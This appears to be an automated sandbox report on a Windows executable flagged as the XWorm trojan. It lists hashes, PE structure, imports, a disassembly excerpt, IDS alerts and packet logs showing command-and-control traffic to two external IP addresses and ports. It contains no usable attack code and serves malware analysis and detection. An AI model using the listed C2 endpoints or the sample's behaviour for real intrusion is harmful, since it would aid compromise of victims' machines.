SHA256:	86ed9f7125ae452d28f9eabd11f5cc9bef747fb751a5aa1283a0ab24952cf508
SHA512:	0570f038d1ee0892ff66aa47b8b8ceca5790f467188b16a5c968f0bfc2891882b3441d090db1b586861a6a84756d2dbcf54e9360970638d5ae987477f012e283
SSDEEP:	3072:NPl4G474Poo9JkbXjEU+QVUjsbCeg2SbAe4ZQeAnuTCt2xbzmyoaq6rcYsc8kOeu:NPW745r2XgUsjsbOZnjZ2x4
TLSH:	15345B92F6C0D4B6D8170175983ACEB2126BBE798974110B36E9372F5EB72831937E07
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L....b.f.................v...T.....

File Icon


Icon Hash:	20246c0c56e20926

Static PE Info

General

Entrypoint:	0x405b41
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x668362D5 [Tue Jul 2 02:15:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b47c746b58dc722dcec07246158fda2

Entrypoint Preview

Instruction
call 00007F746094B1B5h
jmp 00007F7460943C8Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007F7460943E14h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
jne 00007F7460943E09h
push eax
call 00007F74609426EFh
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F7460943E65h
call 00007F7460947A1Eh
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [004201F8h]
je 00007F7460943E14h
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F7460943E09h
call 00007F746094BB8Fh
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [0041FEB8h]
je 00007F7460943E18h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F7460943E0Ah
call 00007F746094B3EEh
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F7460943E16h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F7460943E0Ch
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword ptr [0041F920h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
mov edx, dword ptr [ebp+18h]
push ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d95c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x1c748	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x40000	0x138c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c368	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17548	0x17600	2832193bc838d3749cda385130dee996	False	0.5840261530748663	data	6.643994573279363	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x50e0	0x5200	2b632e407db410004511f129777602b4	False	0.3598513719512195	data	4.9252502906591396	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x37c4	0x1a00	268250434fbffdf0a4bf9cf4a64d29c5	False	0.3167067307692308	data	3.867957401461582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x1c748	0x1c800	13c7e8b4f8049f0b57e98c87b62e9647	False	0.2745768229166667	data	4.800930470827677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x40000	0x1e2c	0x2000	061df8fc06366d9ad70b17618c2ca63b	False	0.482666015625	data	4.816108713673021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x233a0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.2554878048780488
RT_ICON	0x23a08	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.3602150537634409
RT_ICON	0x23cf0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Chinese	China	0.39344262295081966
RT_ICON	0x23ed8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.4358108108108108
RT_ICON	0x24000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.4986673773987207
RT_ICON	0x24ea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.5888989169675091
RT_ICON	0x25750	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Chinese	China	0.548963133640553
RT_ICON	0x25e18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.40534682080924855
RT_ICON	0x26380	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.18236129184904767
RT_ICON	0x36ba8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.3425838450637695
RT_ICON	0x3add0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.3924273858921162
RT_ICON	0x3d378	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.49953095684803
RT_ICON	0x3e420	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.580327868852459
RT_ICON	0x3eda8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.6906028368794326
RT_GROUP_ICON	0x3f210	0xca	data	Chinese	China	0.6089108910891089
RT_VERSION	0x3f2dc	0x304	data	Chinese	China	0.43134715025906734
RT_MANIFEST	0x3f5e0	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap

WININET.dll

InternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-19:27:48.531831	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49708	59.56.110.103	192.168.2.10
07/02/24-19:28:02.641410	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49708	7000	192.168.2.10	59.56.110.103
07/02/24-19:26:31.035751	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49708	7000	192.168.2.10	59.56.110.103
07/02/24-19:25:03.851820	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49708	7000	192.168.2.10	59.56.110.103
07/02/24-19:28:02.635547	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49708	59.56.110.103	192.168.2.10

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:24:45.026818037 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:45.031827927 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.031934977 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:45.032059908 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:45.036792040 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979119062 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979178905 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979186058 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979269981 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:45.979298115 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:45.979443073 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979449987 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979460955 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979470015 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979518890 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:45.979518890 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:45.979882002 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979888916 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979895115 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.979955912 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:45.984069109 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.984087944 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:45.984224081 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.216850042 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.216912985 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.216967106 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.217000008 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.217034101 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.217034101 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.217108011 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.217116117 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.217164993 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.217288017 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.217390060 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.217854977 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.217860937 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.217873096 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.217978001 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.218102932 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218230009 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.218240023 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218245983 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218308926 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.218436956 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218488932 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.218550920 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218558073 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218569040 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218575954 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218601942 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.218635082 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.218991041 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.218998909 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.219053984 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.219441891 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.219516993 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.219520092 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.219527006 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.219573975 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.221932888 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.222018003 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.222088099 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.222161055 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.222167015 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.222173929 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.222218990 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.222218990 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.454722881 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.454783916 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.454791069 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.454844952 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.454844952 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.455092907 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455102921 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455115080 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455121994 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455185890 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.455446959 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455454111 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455460072 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455503941 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.455527067 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.455765009 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455770969 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455784082 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.455826998 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.456182957 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.456188917 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.456195116 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.456201077 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.456212997 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.456219912 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.456224918 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.456240892 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.456240892 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.456262112 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.456290960 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.456994057 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.457000017 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.457012892 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.457060099 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.457060099 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:46.548846006 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:24:46.548969030 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:24:50.512407064 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:24:50.517437935 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:24:50.517569065 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:24:50.770144939 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:24:50.911608934 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:03.851819992 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:03.856626987 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:04.185338974 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:04.238194942 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:04.514658928 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:04.519702911 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:16.926495075 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:16.932051897 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:17.262506962 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:17.265055895 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:17.269995928 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:18.491913080 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:18.535146952 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:30.004367113 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:30.009336948 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:30.339859962 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:30.343574047 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:30.348565102 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:43.082802057 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:43.087631941 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:43.416511059 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:43.425026894 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:43.429888964 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:48.494132996 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:48.535218954 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:51.458343029 CEST	881	49707	91.208.240.157	192.168.2.10
Jul 2, 2024 19:25:51.458450079 CEST	49707	881	192.168.2.10	91.208.240.157
Jul 2, 2024 19:25:53.395464897 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:53.628973007 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:53.642569065 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:53.642595053 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:53.973797083 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:53.977257013 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:53.982192993 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:54.270006895 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:54.274880886 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:54.603859901 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:54.619333982 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:54.624145031 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:54.941957951 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:54.947242975 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:55.035686970 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:55.040543079 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:55.239356041 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:55.244496107 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:55.275682926 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:55.285409927 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:55.334037066 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:55.517119884 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:55.519125938 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:55.524116039 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:55.796210051 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:55.801194906 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:55.805977106 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:56.754271030 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:56.759324074 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:57.087941885 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:25:57.089941025 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:25:57.094856024 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:04.942106962 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:04.947887897 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:05.082530975 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:05.087430954 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:05.276668072 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:05.280270100 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:05.286572933 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:05.524923086 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:05.530759096 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:05.535940886 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:10.332664967 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:10.337512970 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:10.426253080 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:10.431102037 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:10.441837072 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:10.446621895 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:10.473146915 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:10.477962017 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:10.666465044 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:10.669002056 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:10.673846960 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:10.906523943 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:10.916600943 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:10.921535015 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:11.159605026 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:11.170754910 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:11.175685883 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:11.177151918 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:11.182199955 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:11.411134005 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:11.416021109 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:11.973893881 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:11.975536108 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:11.980379105 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:14.019992113 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:14.025361061 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:14.354161024 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:14.356132030 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:14.360889912 CEST	7000	49708	59.56.110.103	192.168.2.10
Jul 2, 2024 19:26:15.551229954 CEST	49708	7000	192.168.2.10	59.56.110.103
Jul 2, 2024 19:26:15.578768969 CEST	7000	49708	59.56.110.103	192.168.2.10
